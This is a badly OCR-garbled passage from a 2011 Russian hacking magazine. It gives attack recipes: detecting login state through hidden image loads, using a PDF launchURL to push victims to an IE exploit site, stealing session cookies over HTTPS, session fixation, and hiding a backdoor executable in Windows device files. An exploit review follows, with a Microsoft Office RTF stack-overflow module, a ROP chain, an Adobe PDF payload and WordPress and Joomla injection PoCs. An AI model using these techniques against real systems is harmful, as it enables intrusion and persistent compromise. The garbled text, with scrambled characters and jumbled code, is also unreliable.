Тѵѵіиег, РасеЬоок и т.д.) авторизован пользователь? Міке Сагбѵѵеіі ( доо. 
д[/РІ08а ) отыскал интересный способ. Суть проста — пользователь за- 
ходит на нашу страницу, и расположенный на ней яваскриптделаетза- 
прос на сервер, авторизация на котором нас интересует. Запрос должен 
быть та ким, чтобы неавторизованный пользователь видел ошибку (404, 
500 ит.д.), а авторизованный — нормальный ответ(200). По коду ответа 
и определяется состояние авторизации пользователя. 

Вариантов реализации в зависимости от ситуации было предложе- 
но два. 

Для Отаіі, где загрузка и просмотр изображений возможны только 
для авторизованных пользователей, — все просто и работает на всех 
браузерах: 

<іт§ 5І:у1е= ,, сІІ5р1ау : попе; " 

оп1оасІ = "1о§§есІ_іп_1:о_§таі1() " 
опеггог="по1:_1о§§есІ_іп_1:о_§таі1( ) " 



5гс = "Іі1:1:р5 : / /та іі . §оо§1е . сот/та И/рІіо1:о5/іт§/рІіо1:о5/ 
риЬ1іс/АІЬЕіАІАААВ0СКа_ЬѴр24и2МІІуІІ_сІтІ\ІІ'істК-Рс(!іІіѵсІС8дК0І1 
ООРкОСѴіМ2І52]1)ы2т21У] ЕЗМгдгУтРуМдАіМ] Р12ТІІЗМ] ЕгОТУыАІыБ 
Ст_ММи0зб599І§оА2тиЕтЕ20" 

/> 

Итак, мы подгружаем скрытое изображение. Если пользователь залоги- 
нен в системе, то событие опіоаб отработает, так как изображение может 
быть подгружено браузером, и опеггогв ином случае (сервер редиректит 
на страницулогина). Само изображение лежит на Отаіі. Втом случае, 
если нет возможности работать с изображениями, можно попробовать 
подгрузку Ыті-страниц. 

кзсгірі: 1:уре= ,, 1:еx1:/^аѵа5сгір1: ,, 5гс="Ы:1:р5 : //ЪѵііЪЪег . сот/ 
ассоип1:/и5е_рІ1x?5е1:1:іп§=■Ра15е&атр;■Ро^та1:=1:еx1: ,, 
оп1оас1="по1:_1о§§ес1_1п_1:о_1:ы11:1:ег( ) " 
опепгог="1о§§есІ_іп_1:о_1:ыі1:1:ег( ) " 
а5упс="а5упс" 

></зсгір1:> 

Ноэтотспособ не будет работать с ІЕ и Орега.таккакони могут под- 
гружать только корректные яваскрипты, то есть опіоаб у них не будет 
срабатывать даже при позитивном заголовке сервера. 

В чем практическая польза этого хака? Конечно, на большинстве круп- 
ных сайтов можно найти некие закутки и использовать данную методику. 
Но кроме небольшого раскрытия инфы о пользователе — пользы ника- 
кой. Хотя, если совместить этот ха к с други ми техникам и, то возможно и 
получится что-то дельное :]. 




ЗАДАЧА: СМЕНИТЬ БРАУЗЕР 
ПОЛЬЗОВАТЕЛЯ, ИСПОЛЬЗУЯ РОЕ. 



РЕШЕНИЕ: 

Представь следующую ситуацию. Мы затащили жертву на наш злой 
сайт, но юзер использует браузер, под который у нас нет сплоита — 
например, СЬготе. Какзаразить такого пользователя? Для данной 
ситуации есть одна интересная методика, основанная на том, что 
ІЕостается браузером поумолчаниюу многих пользователей, вне 
зависимости оттого, в каком браузере они проводят большую часть 
времени. Очень часто эта ситуация справедлива для корпоративных 
сетей, во многих из которых все еще стоят старые версии ІЕ с запре- 
том смены браузера поумолчанию.Таквот, заманив пользователя к 
нам на сайт, мы можем воспользоваться новым триком и при помощи 
специального РОЕ-файла заставить компьютер пользователя от- 
крыть любую страницу через ІЕ. Все что нужно сделать — это про- 
писать в РОЕ-файле следующий код: 

арр. ІаипсЫІКЦ " Ы:1:р : //ехр1оі1:--Роп-іе. сот/'Д 1:гие) ; 

Здесь должно быть все понятно. Мы указываем АсгоЬаІ Реабег’у 
в я ва скрипте, что следует открыть новое окно по ссылке. Первый 
параметр АРІ-вызова — ІІРІ_ открываемого сайта. Второй — открыть 
в новом окне. 



Суть атаки втом, что мы перенаправляем пользователя с хромом на 
данную РОЕ, а РОЕ, запустившись в АсгоЬаІ Реабег’е, откроетновое 
окно с помощью браузера по умолчанию (в нашем случае ІЕ). Пример 
работы этого трюка можно заценить здесь: ЬІІ.Іѵ/рЗиЫт) . Предвос- 
хищая твои мысли, сразууточню, что если запустить такую РОЕ’ку с 
локального диска, то появится уведомительное сообщение, которое 
спалит всю затею. 
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ЗАДАЧА: 

НАУЧИТЬСЯ КРАСТЬ СЕССИИ ИЗ НТТР5. 



РЕШЕНИЕ: 

Принято считать, что протокол НТТР5 — это некая всесильная тех- 
нология, позволяющая защитить пользователя и от фишинга (за 
счет проверки подписи сервера), и от перехвата трафика (за счет 
использования средств шифрования). Конечно, протокол хорош, 
но и в самом 5512 е (с версии 3 — ИЗ), и в его практических реали- 
зациях есть много проблем. Плюс если раньше все понимали, что 
НТТР небезопасен, и были осторожны, то с доверием к НТТРЗ’у, в 
определенных ситуациях у злоумышленников теперь даже больше 
шансов на успех, чем было раньше. В прошлом номере я писал 
п ро о нл айн- сервис для про верки сайтов. Продолжая тему, я по- 
стараюсь коснуться основных проблем протокола НТТР5 в этом и 
следующих выпусках. 

Итак, давай вспомним, как происходитавторизация пользователя 
на большинстве порталов. При входе на сайт пользователь вводит 
логин и пароль в формочке, после чего отправляетзапрос на 
сервер. Сервер проверяет да иные, и если они правильны, то при- 
сваивает данному пользователю некий случайный идентификатор 
сессии. Этот идентификатор сервер посылает пользователю, как 
поле в заголовке ответа, если точнее — в кукисах. Далее, бродя по 
сайту и кликая по ссылкам, пользователь, кроме ІіРЕов отправляет 
в запросах к серверу и куки с идентификатором сессии. То есть, как 
мы видим, пароль передается только один раз. Секьюрно :). 

Но если мы перехватим идентификатор в куках, то, подставив их 
в свой браузер, свободно сможем выполнять любые команды от 
имени пользователя, чьи куки мы украли. 

Давай представим, что мы смогли приблизиться достаточно близко 
к жертве: например, сидим с ней на одной точке доступа ѴѴ-Рі и 
провели Мап-іп-Ібе-ппісІсІІе-атаку. Поскольку пользователь рабо- 
тает с сайтом по НТТР5, то даже если мы сможем отснифать трафик, 
на выходе получим лишь зашифрованный дамп. Что же делать? 
Нужно посмотреть, присутствует ли флагЗесиге при установке 
сессионного идентификатора в Соокіе. Этот флаг указывает на 
возможность передачи кукисов только через НТТР5. Если флаг не 
установлен, то нам повезло, и существует пара способов для кражи 
таких кукисов. 

1. Пассивный метод. Очень часто бывает, что на сайте только один 
поддомен защищен НТТР5, но куки устанавливаются на все под- 
до мены, в то мчи елейна незащищенные НТТР5. Так поступают из 
соображений производительности, и это тот случай, когда скупой 




Сессиные куки, отсутствие флага Бесиге, 
поле Оотаіп на все поддомены 



платит дважды. В этом случае все что нам нужно для перехвата 
кукисов — это подождать, пока пользователь обратится к незащи- 
щенной части сайта. Куки передадутся в открытом виде, и мы легко 
получим к ним доступ. 

2 . Активный метод. Если домен в кукисах задан точно и правильно, 
то нам следует поискать какие-нибудь другие открытые порты на 
данном сервере. Порт подойдет любой. Например, очень часто 
бывает, что 80 порт на ЫТрз-ном домене оставляют, на нем висит 
редирект на 443 порт. Такой вариант нам отлично подойдет. 
Требуется дождаться любого исходящего НТТР-запроса от поль- 
зователя. После этого необходимо подменить ответ веб-сервера, 
добавив Нтате (например) со ссылкой на атакуемый сервер, но с 
нестандартным портом (80 в нашем примере). Браузер пользова- 
теля, увидев Тгате, подключится на этот нестандартный порт и 
первым же запросом передаст все свои куки в открытом виде. 

С практической точки зрения порт может быть любым, нонеочень 
хорошо юзать стандартные порты типа 21 , 22, 25, 1 1 0, так как 
исходящие запросы на них в некоторых браузерах (например, в 
Рі гебох) заблокированы. 

Хотелось бы еще раз отметить, что с данным флагом — Бесите — 
у очень многих компаний проблемы. Как поставить этот флаг? 
Во-первых, установить его может программист, четко указав это в 
приложении. Во-вторых, можно настроить обязательную установку 
на уровне веб-сервера. Как пример, в Арасбе Тотсаі до 6.20 флаг 
Бесиге требуется задавать вручную. 




ЗАДАЧА: ПОДМЕНИТЬ 
ПОЛЬЗОВАТЕЛЬСКУЮ СЕССИЮ. 



РЕШЕНИЕ: 

У описываемойтехники есть стандартное название — 5ез5Іоп_Еіха1:іоп 
( Ьіиѵ/пМгѵуЦр ). Суть ее заключается в том, чтобы привязать атакуе- 
мого пользователя к конкретной сессии, значение которой нам уже 
известно. 

Для реализации данной атаки намтребуется соблюдение двух 
условий. Во-первых, некий скрипт на атакуемом сервере, который 
позволяет в результате обработки входных данных отдавать в ответе 
заданный сессионный идентификатор. 

Во-вторых, при входе пользователя в систему не должна осущест- 
вляться переинициализация сессионного идентификатора пользо- 
вателя. Как часто возникаюттакие случаи? Я бы сказал, что многое 



зависит от размеров атакуемой системы и используемыхтехнологий. 
Алгоритм же атаки в общем виде таков: 

1) Злоумышленниквходитна атакуемый сайт и авторизуется на нем. 

2 ) Злоумышленник получает сессионный идентификатор. 

3) Злоумышленник подкидывает неавторизованному на сервере 
пользователю ссылку на скрипте сервера, который устанавливает куки 
с идентификатором злоумышленника. 

4 ) Пользователь авторизуется в системе. 

5 ) Злоумышленник входит в систему под пользователем, так как ему 
известен сессионный идентификатор. 

Как мы можем видеть, у нас получается захват пользовательской 
сессии. Что приятно для нас — реализовать это можно и по НТТР, и по 
НТТР5. В качестве места для экспериментов могу предложить тебе 
проект ѴѴеЬОоаІ от ОѴѴАБР’а ( ЬТ.[у/|'едеОЕ ). Это автономный веб-сервер 
с группой уязвимых скриптов под различные уязвимости. 
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Но с помощью колдовства файлы устройств даже запустить можно 



нЕшпЭ ± скс 



№7 



ЗАДАЧА: СОЗДАТЬ НЕУДАЛЯЕМЫЙ 
ФАЙЛ ПОД ѴѴІШОѴѴ5. 



РЕШЕНИЕ: 

Конечно, неудаляемых файлов не бывает :). Но вотзатруднить удале- 
ние файла так, что без гугла не справиться — это можно. Зачем может 
понадобиться такая возможность? Например, для того чтобы закачан- 
ный шелл или бэкдор неудалили. 

Способ заключается втом, что нашу информацию мы будем хранить 
в специальныхфайлах — файлахустройств. Они появились еще в 
далекие времена ООБ’а и, по идее, использовались для прямого 
обращения кустройствам (люди, жившие вто время, но все еще 
читающиежурнал «Хакер», могут меня поправить :). С учетом ЬаскѵѵагсІ 
сарабіІИу — эти файлы есть еще во всехѴѴіпсІоѵѵз. Если конкретнее, то 
файлы эти - СОІЧ, АІІХ.СОМх, N01, РВЫ, 1_РТх, СЬОСКх (где х- число 
от 1 до 9). Смысл большинства из них, я думаю, ясен. Основная фича 
втом, что их не создать обычным образом, а создав — неудалить. И 
запускаются/читаются они тоже нестандартно. 

Но перейдем кделу. Чтобы создать файл, нам потребуется написать в 

КОНСОЛИ: 

Сору Іпіе . 1:х1: \\.\с:\ССМ 

Таким образом, мы можем создавать файлы устройств и записывать в 
них информацию. Самое простое — закинуть данные сначала в РІе.М. 
Путьдо СОЫ лучшеуказывать полный. Вывод информации осущест- 
вляется аналогично, но наоборот. 

Сору \\.\с:\СОЫ Ійіе.ііхі: 

Но самое интересное втом, что мы можем положить в файл устройства 
ехе’шник. Например, для наглядности я положил в СОЫ стсТехе: 



\Ѵ\с:\сок 

\ѴУ:\№Р (Ѵм/чй/АП}: у 
ТчТ сйрі * 3- 



іГ ОпіНка ■ Материи 







Файлы устройств просто так прочитать нельзя 



сору с : \ыіпсІоы5\5у5І:ет32\стсІ . ехе \\.\с:\СОЫ 

Самая же главная магия происходит, когда нам требуется запустить 
такой СОІ\І-стсІ.ехе: 

мтіс ргосезз саіі спеа1:е \\.\с:\С(М 

Что приятно, да иная фича работает и в ѴѴіпбоѵѵз ХР и в 7. А если 
мы закинем файл в какую-нибудь системную папку, то спрятанный 
бекдорчи к совсем не будет вызывать подозрений. Жаль только, 
что для антвирусов данные файлы совсем не проблема. □С 
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взлом 



I іѵ (іѵіпзісіе.ЫодзроІ.сот) 
рікоіагасі (115612, дер. Красная звездочка, д.1) 





ЕХРЮІТЗ 
ЕѴІЕѴУ 1 


1 




ЕХРЮІТЗ 

КЕѴІЕѴѴ 




ОБЗОР 
ЭКСПЛОИТОВ 





Приветствуем тебя, о достопочтимый читатель! Пишем тебе 
из деревни Красная звездочка, что во Владимирской области 
зиждется. Погода у нас отличная, да и вообще хорошо 
отдыхается. Давеча праздник какой-то отмечали - вино лилось 
рекой, и мужики местные, захмелев, проговорились, что ходит 
по интернетам молва об эксплоитах новых и интересных, да 
все подробности о них тут же и выложили. Мы послушали- 
послушали, да и решили рассказ сей тщательнейшим образом 
законспектировать и к письму этому приложить. 



М5 ОТПсе 2010 РТР Неасіег 51аск 
ОѵѳіТІоѵѵ ѴиІпегаЬіІіІу Ехріоіі 



СѴ55 Ѵ2 ВАЗЕ 5С0РЕ: 9.3(НЮН)| 



«Изображение свойств объектов. 

Основная масса изображаемых объектов определяется серией свойств. 
Управляющиетэги располагаются следующим образом: первым идет 
тэг«{\зЬр», за ним следует «{ѴЛзЬріпзІ:». Далее идущиетэги описывают 
все свойства фигуры. Каждое из свойств имеет следующий формат: 




Дата релиза: 3 июля 201 1 года 
Автор: Зпаке 
СѴЕ: СѴЕ-201 0-3333 



( АѴ: Ы/АС : М/Аи : N/0 : С/І : С/А: С ) 



Переполнение буфера на стеке в МісгозоГГ ОГГісеХР 5РЗ, ОТТісе 2003 5РЗ, 
ОТТісе 2007 5Р2, ОТТісе 20 1 0, ОТбісе 2004 апб 2008 Гог Мае, ОГГісе Гог Мае 
201 1 апб Ореп ХМ I Рііе РогтаГ СопѵегГегГог Мае позволяетзлоумыш- 
леннику исполнить произвольный код, используя специальным образом 
сформированные НТР-данные. 

Данный эксплоит примечателен несобственно реализацией уязви- 
мости (о ней было известно еще в октябре прошлого года), а использо- 
ванием техники, названной «Ікагисбі 0ЕР/А5РІ_ Вуразз», для обхода 
защитных механизмов 0ЕР/А5І_Р. 



{\зр{\5п Ргорег1:уМате}{\5ѵ РгорегТуѴаІиеІігРогтаТіоп}} 

Каждое свойство фигуры, определенное тэгом «\зр» представляет собой 
пару: имя («\зп») и соответствующее это му имени значение («\зѵ») . » 

В РОС РТЕ-файле за тэгом «\зп», задающего имя «рЕгадтепГз» для 
свойства, следуеттэг«\зѵ», задачей которого является описание значе- 
ний для заданного ранее свойства «рРгадтепГз». Данный тэг содержит 
значения, разделенныеточкой сзапятой, третье из которых имеет 
неблаговидный лик, ну и, соответственно, обрабатывается при разборе 
РТЕ-файла вордом неверно. В общем виде структура эксплоита должна 
выглядеть следующим образом: 

{\г1:-Р1{\5Іір{\*\5Ііріп5І:{\5р{\5п рРга§теп1:5}{\5ѵ А; В; [ыогсіі] 
[могсІ2] [ыогсІЗ] [бех_ѵа1ие_аггау] }}}}} 



ЕХРЮГТ 



Выдержка из спецификации РТР(РісЬТехІ Рогтаіідля МісгозоГі ОГГісе 
ѴѴогб 2003: 



А — целочисленное значение, которое не может быть равно 2,4 или 8; 

В — целочисленноезначение; 

ѵѵогсіі — 2-байтовоезначение(зІ2еоГ(ѴѴ0РВ)), которое не может быть нулем; 



► 044 



ХАКЕР 09 /1 52/ 201 1 







21 

22 

23 

24 
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25 

27 

28 
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32 
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зь 

35 

37 
ЗН 
39 
49 

41 

42 

43 

44 

45 

46 

47 

48 

49 

50 

51 
5? 

53 

54 

55 

56 

57 



деІіСслІідРіІеО 



риЫіс 5іа1:іс 

іст~ = СоіИМдРіІе: : -д е-1; I п зНапсе { 



ІСГІТ = Ц»еМ$_5ЕВШ[ в «1 г ]) *_5ЕВЯ0*Г[ "еоі 1 1 — ’чііГ ) 1 И \гѴГ г И \іга"і 

5с = ІсІ^деіСопТідІ ) : 



// 

5Г€И = ^7рйр' . $сг17 
. У * $сг1і 

, 1 1 оепег*ігй сопЩиШіогі Ше' * ІсгІІ 
. 1 ■ СепегаТесІ Ьу: рМрГіуДсІтіп * 

- $<Я0ВА15рРт СопГід*]->зеі( а РНЛ УЕВЗІѲМ} 

, я &еіир бсгірі' + ІсгІС 
. 1 * Раіе; ' . <1аіе(ВАТС КГС1І23^ . ІсгѴТ 
- ' V - $сгН , |сг1Т; 



// аегѵегъ 

И ($і Г^деіЗег ѵегСоітК ) з 0) { 

$гес ■= V* Бепгегь согіТідигэііорі ѴІсгІГМі - й ; 11 . ІиггІГ , 
ГсгелсН ($с | 1 5і' і ѵк г 5 1 1 лй $і[1 “■ $здгиег) { 

$геі . - V 4 5егѵег: " - ъігіг($с(-*деі5егѵегНате($ій] , ' А 

* р ІСГІІ; 

ТогеасЬ < З^ег ѵег йі %Ѵ. -> $ѵ] { 

|к = ргед геріасеі 1 /І А А-2э-гО-^_1/ % к _Ч $Ю; 
іге* -= -\|сТд[ к 5егѵег5 ][\$Щ я $к я ] - н 

, (і& эггау[$ті} ЬйьйИ:: Ій7сгоНлйсгіАгГсіу( 

7 ѵг-Т Т * : _ехро> г* 2его В а 5<з<ЗД г гау {$ѵ ( $сгі.і) 

: ѴѲГ ехрогТ($ѵ, Гг'іи:) ) 

. Т . ІсгІТ і 

} 

$ГСТ .= $СГІТ; 

I 

Ігеі .= V* Еий аі йегѵег& соіШдигаПап ѵ к - ісПТ , ІСГІТ; 

) 

ип5ет($с[ ’^егѵегй' ] ) ; 



ІсгІТ г 

/\ "-О - " ГШ] V" - ІсгІТ 



Функция, генерирующая конфиг рИрМуАсітіп 



ѵѵогсІ2 — 2-байтовое значение, которое не может быть больше чемѵѵогсіі ; 
ѵѵогбЗ — 2-байтовое значение, которое будет использоваться как размер 
для переполнения буфера на стеке; 

ѵѵогб 1 *ѵѵогсІ2 — должны быть равны размеру выделяемой памяти под 
массив Ьех_ѵа1ие_аггау, соответственно значение это должно быть в 
меруадекватно; 

Ьех_ѵаІие_аггау — строка, содержащая значения, которыми будет 
перезаписываться буфер, располагающийся на стеке, в процессе его 
переполнения. 

При начертании ѵѵогб 1 ,ѵѵогб2 и ѵѵогбЗ необходимо использовать обрат- 
ный порядокзаписи: первым идет младший байт, затем старший. 
Краткий отрывок из модуля для ппеіазріоіі, генерирующего ііР-файл, 
которы й будет эксплуати ровать данную уязви мосты 

вріоіі: = "%сі;%сі;" % [е1_5І2е і е1_соип1:] 
вріоіі: << сІа1:а.ипраск( 'Н* ' ) .Рігві: 
вріоіі: << ге5і.ипраск( 'Н* ') .Рігві: 

сопіепі: = "{\\г6-Р1" 

сопіепі: << "{\\вбр" # фигура 

сопіепі: << "{\\5р" # свойство фигуры 

сопіепі: << "{\\5П рРга^тепів}"# имя свойства 

соітЬегтЪ << "{\\бѵ ^вріоіі}}" # значение свойства 

сопіепі: << "}" 

сопіепі: << "}" 

сопіепі: << "}" 

ргіітЬ_5'Ьа'Ьи5( ,, Сгеа'Ьіп§ '#{сІа1:а5І:оге[ ' РИЕЫАМЕ ' ] } ' Рііе ...") 
Рі1е_сгеа1:е(соп1:еп1:) 



Перезапись буфера на стеке происходит в следующем месте библиотеки 
тзо.сИІ: 



39200661 


]‘е вбогі: тво. 39200682 




39200663 


тоѵ есх^могсі ріг 55 : [ебр+8] 




39200666 


тоѵ еах^сііл/огсі ріг сів: [есх+с] 




39200669 


апсі еах^0-р-р-р-р 




3920066е 


ривб еах 


і п 


3920066-Р 


ітиі еах^ыопсі ріг вв:[е6р+10] 




39200673 


асИ еах^ыогсі рѣп сів: [есх+10] 




39200676 


ривб еах 


; зге 


39200677 


ривб сіыогсі р1:г 55:[е6р+с] 


; сіеві: 


3920067а 


саіі <]‘тр.&т5ѵсг90.тетсру> ; тетсру - оѵегРІом! 


3920067-Р 


асісі евр^с 




39200682 


рор ебр 




39200683 


пе1:п 0с 





В конце концов мы попадаем на первый адрес в РОР-цепочке, исполня- 
ем ее и видим калькулятор. 

Атеперь немного подробнее про РОР-цепочку: 

0ХЗР2СВ9Е0 РОР ЕСХ 

КЕТЫ 

# НеарСгеаіеО ІАТ = ЗР10115С 

0ХЗР389СА5 МОѴ ЕАХ,ОІлІОКО РТК 05: [ЕСХ] 

КЕТЫ 

# ЕАХ == адрес НеарСгеа1:е( ) 
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взлом 



ЕХРЮІТ5 
КЕѴІЕѴѴ / 



ЕХРЮІТ5 

КЕѴІЕѴѴ 



ЕХРЮІТЗ 

РЕѴІЕѴѴ 





- Ітпші.Іу ■ Щфг 3(Ри ігліп (Г’-'м * , 



0ХЗР39АРСР САН ЕАХ 
КЕТЫ 

# Вызываем НеарСгеа1;е( ) и создаем 

# исполняемую кучу после этого вызова ЕАХ 

# содержит адрес созданной нами кучи 



Передача управ- 
ления на начало 
ВОР-цепочки 



Развитие Х55- 
уязвимости 
Джумлы — С5ВР 
эксплоит 



0ХЗР2СВ9ЕѲ РОР ЕСХ 

КЕТЫ 

# рор 0X00008000 в ЕСХ 

0ХЗР39СВ46 АООЕАХ,ЕСХ 

РОР Е5І 
КЕТЫ 

# прибавляем ЕСХ к ЕАХ вместо того, чтобы вызывать 

# НеарАНос, теперь ЕАХ указывает на КІлІХ-кучу 

0ХЗР2СВ9Е0 РОР ЕСХ 

КЕТЫ 

# рор 0ХЗРЗВЗОС0 в ЕСХ., по этому адресу 

# можно что-нибудь записать 

0ХЗР2233СС МОѴ ОІлІОКО РТР 05: [ЕСХ], ЕАХ 

КЕТЫ 

# сохраняем адрес нашей КІлІХ-кучи по адресу 

# 0хЗРЗВЗОС0 (ЕСХ) для дальнейшего использования 

0ХЗР2О59ОР РОР ЕАХ 

АРй ОІлІОКО РТК 05:[ЕАХ],Е5Р 

КЕТІМ 

# рор 0ХЗРЗВЗОС4 в ЕАХ, по этому адресу 

# содержится 0 и туда можно что-нибудь записать 

# Что мы и сделаем, прибавив к 0 значение 

# регистра Е5Р, адрес Е5Р нам нужен, 

# скопировать шеллкод (который располагается на стеке) 

0ХЗР2Р18СС РОР ЕАХ 

КЕТІМ 

# рор 0ХЗРЗВЗОС4 ( Е5Р асИгезз ) в ЕАХ 

0ХЗР2В745Е МОѴ ЕСХ, ОІлІОКО РТК 05: [ЕАХ] 

КЕТІМ 



# сейчас ЕСХ указывает на ближайшее смещение 

# стека 

0ХЗР39795Е РОР ЕОХ 

КЕТМ 

# рор 0X00000024 в ЕОХ 

0ХЗР39СВ44 А00 ЕСХ, ЕОХ 

А00 ЕАХ, ЕСХ 
РОР Е5І 
КЕТЫ 

# прибавим 0x24 к ЕСХ (адрес стека) 

0ХЗР398267 МОѴ ЕАХ, ЕСХ 

КЕТЫ 

0ХЗРЗА16ОЕ МОѴ ОІлІОКО РТК 05 : [ ЕСХ] , ЕАХ 

ХОК ЕАХ, ЕАХ 
РОР Е5І 
КЕТЫ 

# скопируем значение ЕАХ (51:аск АсІсІге55+24 = 

# текущее значение Е5Р ) по текущему адресу стека 

# и снимем со стека значение в Е5І. Теперь Е5І 

# указывает на начало шеллкода, располагающегося на стеке 

0ХЗР398267 МОѴ ЕАХ, ЕСХ 

КЕТЫ 

0ХЗР2СВ9Е0 РОР ЕСХ 

КЕТЫ 

# рор 0хЗРЗВЗОС0 (сохраненный адрес кучи) в ЕСХ 

0ХЗР389СА5 МОѴ ЕАХ, ОІлІОКО РТК 05 : [ ЕСХ] 

КЕТЫ 

# сейчас ЕАХ указывает на нашу КІлІХ-кучу 



► 046 
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Вызов тетеру, творящий беззаконие на стеке 



0ХЗР2ВѲА7С ХСНСЕАХ,ЕОІ 

КЕТЫ 4 

# ЕйІ = адрес нашей КІлІХ-кучи 



0ХЗР2СВ9ЕѲ РОР ЕСХ 

КЕТЫ 

# рор 0хЗРЗВЗйС0 (сохраненный адрес кучи) в ЕСХ 





ЕХРЮІТЗ 




РЕѴІЕѴѴ 
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Важная функция РМА_сгеа^еТа гдеЛа Ыез 



. і"' * «■■» и. • - іві ! : . і' іі: 



■ - ■ - п у вМ г і --Ѵ-і | 1 гг I іпі I 



Автор: Эпаке 
СѴЕ: СѴЕ-201 1 -061 1 

Ещеодноухищрение, направленное на обход 0ЕР/АВІ_Р и использую- 
щее в качестве базы уязвимость СѴЕ-201 1-061 1, опубликованную 4 мая 
201 1 года. 



ЕХРЮІТІ 



Этот метод обхода механизмовзащиты ПЕР/АБІ_Пбыл назван Таізитакі. 
Применяется он для АбоЬе-Х(но не для запбЬох). Для того чтобы было 
хорошо, необходимо подгрузить библиотеку сгурІосте2.сШ.. 

Кодес для загрузки сгур1осте2.би: 



0ХЗР389СА5 МОѴ ЕАХ^ОІлІСЖО РТК 05: [ЕСХ] 

КЕТЫ 

# ЕАХ указывает на нашу КІлІХ-кучу 

0ХЗР38ВЕРВ АООАЩ58 

КЕТЫ 

# какой-то бред : ) 



0ХЗР2СВ9Е0 РОР ЕСХ 

КЕТЫ 

# рор 0x00000080 в ЕСХ 

# (0x80 * 4 = 0x200 = размер копируемой области) 

0ХЗР3441В4 КЕР МОѴ5 ОіліОКО РТК Е5 : [ЕОІ] , ОІлІОКО РТК 05:[Е5І] 

РОР ЕйІ 
РОР Е5І 
КЕТЫ 

# Копируем шеллкод со стека в КІлІХ-кучу 



0ХЗР39АРСР САН ЕАХ 

КЕТЫ 

# Исполняем шеллкод 



ТАВ6ЕТ5 



МісгозоП ОЮсеХР 5РЗ, ОЮсе 2003 5РЗ, ОШсе 2007 5Р2, 0№се 2010, 
Оббісе 2004 и 2008 для Мае, ОШседля Мас201 1 и ОрепХМІ_ЕіІе Еогтаі 
Сопѵегіегдля Мае. 



50ШТЮЫ 



Установить обновления. 



02 



АсІоЬѳ Кеасіѳг X Аіот Туре СопТизіоп 
ѴиІпегаЬіІііу ЕхрІоіІ 



СѴ$$ Ѵ2 ВАЗЕ 5СОРЕ: 



9.3 (НІОН) 



мана 

Дата релиза: 3 июля 201 1 года 



(АѴ: Ы/АС : М/Аи : N/0 :С/І :С/А:С) (ІедепсІ) 



<</Туре/Са1:а1о§/Ра§е5 3 0 К/ОрепАсТіоп 5 0 К/АсгоРогт 7 0 К >> 
АпсІ 1:Неп 

8 0 об] 

<</І_еп§1:Іі 372>> 
зііпеат 

<?хт1 ѵег5Іоп="1.0" епсосИп§="ІІТР-8" ?> 

<хсІр : хсір ХШІП5 : хсІр=" бТТр : //пз . асІоЬе . сот/хсір/ " > 

<сопб§ хт1п5="ІіНр://мл/м.х-Ра .ог§/зсІіета/хсі/2.б/ ,, > 

<рге5еп1і><рсН : ><іп1:егас1;іѵе>1</іп1:егас1:іѵе></рсН : ></рге5еп1:> 

</сопб§> 

<1:етр1а1:е хт1п5="Іі1:1:р : //ыыы.хТа .оп§/зсІіета/х-Ра- 
ТетрХа^е/г.б/'^ 

<5иЬ-Рогт пате="-Рогт1" ІауоиТ^ТЬ" 1оса1е="еп_ІІ5"> 
<ра§е5е1:></ра§е5е1:> 

</5иЬ-Рогтх/1:етр1а1:е></хсІр : хсІр> 

епсізіігеат 

епсІоЬ] 

хге-р 

Теперь мы можем пользоваться любезно предоставленной библиотекой, 
скомпилированной без поддержки А5І_П, для своих исследовательских 
целей :). 



ГАВОЕТ5 



АбоЬе РІазЬ Ріауегдо версии 10.2.154.27 на ОС ѴѴіпсІоѵѵз, МасОБХ, Ы пих, 
и Боіагіз, и 10.2.156.12 и более ранние версии на Апбгоіб; 

АбоЬе АІП до 2.6.19140; 

АиЮрІау.сШ. (так называемый АиЮРІауиЬ.ЬипсИе) в АбоЬе Реабег9.хдо 
9.4.4 и Ю.хвплотьдо 10.0.1 на ѴѴіпбоѵѵз; 

АбоЬе ПеасІег9.хдо 9.4.4 и Ю.хдо 10.0.3 на МасОБХ; 
также АбоЬе АсгоЬаІ 9.x до 9.4.4 и Ю.хдо Ю.О.ЗнаѴѴіпбоѵѵБИ МасОБХ 
позволяютудаленным атакующим исполнять произвольный кодили 
вызывать отказ в обслуживании сервиса (падение приложения) через 
специальным образом сформированные ЕІазЬ-данные. 



ЮШТІОЫ 



ОбновитьАбоЬе РІазЬ Ріауег. 
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Содержимое КТР-документа, приводящее к падению 




БОЬ-инъекции в ѴѴ/огсІРгезз 3.1.3 



СѴ55Ѵ2 



6.0 






(АѴ: Ы/АС : М/Аи :5/С : Р/І : Р/А: Р) 



Чтотакое ѴѴогсІРгезз должен знать каждый школьник начальных клас- 
сов, поэтому не буду долго по этому поводу распространяться, а сразу 
перейду ближе ктелу. На этот раз уязвимость обнаружена не в каком- 
нибудь плагине, а в самом движке, поэтому ей подвержены абсолютно 
все ресурсы на этом движке, хотя и не абсолютно всех версий. 

Да и с эксплуатацией здесь не всетакпросто: чтобы выполнить 5СН_- 
инъекцию, потребуется пользователь с правами Есіііюг, не меньше! Ну 
и если все сложится хорошо, то ты сможешь поиметь доступ к БД сайта 
с правами пользователя ѴѴогсІРгезз, а, стало быть, и слить реквизиты 
всех пользователей и такдалее. 



ЕХРЮІТ 



Уязвимость существует из-за неподобающей фильтрации переменных, 
короче, какобычно. 

Функция деМегтзО, определенная вѵѵр-іпсІибезАахопоту.рбр, недо- 



ЕХРЮІТ5 

РЕѴІЕѴѴ 



зоттюы 



Нужно обновиться до версии 3.1.4 или 3.2- РОЗ. Если такой возможности 
нет, то можно временно понизить всех пользователей-реда кторов до 
ранга Аибаог. 




Множественные 
Х55-уязвимости в Іоотіа! 1.6.3 



СѴ55Ѵ2 



6.8 






( АѴ: Ы/АС : М/Аи : N/0 : Р/І : Р/А: Р) 



В конце июня сего года этническими хакерами из группировки УСЫ 
было опубликовано полное раскрытиеуязвимостей в базовых компо- 
нентах Зоотіа, а именно: сот_соп1:асЕ сот_соп1:епЕ сот^еѵѵзі'еебз и 
сот_зеагсб. Уязвимости позволяют атакующему внедрить в содержи- 
мое страницы произвольные скрипты, тем самым завладев данными 
сессии беспечного пользователя, перешедшего по специально сфор- 
мированной ІІРІ_. 



ЕХРЮІТ 



Некоторые параметры в базовых компонентах Зоотіа! неотличились 
выдающимися результатами по фильтрации спецсимволов, среди них 
ОиегуЗіхіпд, орбоп и зеагсбѵѵопі РоС для компонента сот_соп1:асІ и 
параметра ОиегуЗіхіпд выглядиттак: 

бббр://аббаскег . іп/доот1а163_по5ео/іпсІех. рбр?орбіоп=сот_с 

опбасб8Л/іем=сабе§огу&сабісІ=26&ісІ=36&ІбетісІ=- 

